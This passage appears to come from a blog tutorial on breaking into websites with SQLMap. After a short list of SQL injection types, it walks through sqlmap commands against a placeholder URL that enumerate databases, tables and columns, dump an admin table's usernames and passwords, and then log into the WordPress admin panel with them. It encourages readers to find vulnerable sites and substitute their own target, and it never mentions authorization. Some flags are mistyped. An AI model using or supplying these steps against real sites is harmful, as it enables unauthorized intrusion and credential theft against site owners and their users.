- Statement Injection
- Union Queries
- Illegal/Logically Incorrect Queries
- Stored Procedure Injection
So, how to hack a website with SQLMap?
Before starting how to hack a website, we need a few things to get started.
- Linux OS (I would recommend Kali Linux)
- SQLMap (if not in your Linux pre-built)
- WordPress Website
As you get all the required things, we move on the steps to follow to hack a website with SQLMap.
- First of all, make sure we have a Linux installed ready to use machine.
- Open a terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal.
- Now find the vulnerable site. You can check out how to find vulnerable websites here. After finding the vulnerable website, type python sqlmap.py -u http://target.com/index.php?id=4 –dbs in the sqlmap. Make sure to replace link with your target website.
- As you hit Enter, You will get the database name of the website.
- Well we come to know about the database now. It’s time to get the tables from Information Schema. For that, you need to put the following command in the sqlmap.
python sqlmap.py -u http://target.com/index.php?id=4 -D DatabaseName –tables
- It will look like the below screenshot in my scenario.
- This will give us a list of all the tables in the target database.
- As you can see, we got all the tables of the target database, now we need to predict which table might be getting used for users or admins. In the most of cases, admin and users table contains the administrator login info. As you can see we have a table named as admin. Now we will try to get its columns. To get the columns, type the following command in the sqlmap.
python sqlmap.py -u http://target.com/index.php?id=4 -T admin –columns
- After hitting Enter, we get columns of the admin table.
- Well here luckily we got username and password columns. Now we try to get the username and passwords of the admin table. To do that, simply type the following command.
python sqlmap.py -u http://target.com/index.php?id=4 -T admin -U test –dump
- Wow..!! We got the admin username and password of the wordpress website here.
- Finally, we have username and password. Now just type the target’s admin URL and just use the grabbed username and password to login. WordPress admin panel URL would look like.
That’s all..! Hope it will work for you. This is all how to hack a website with SQLMap. If you encounter any problem, feel free to comment below.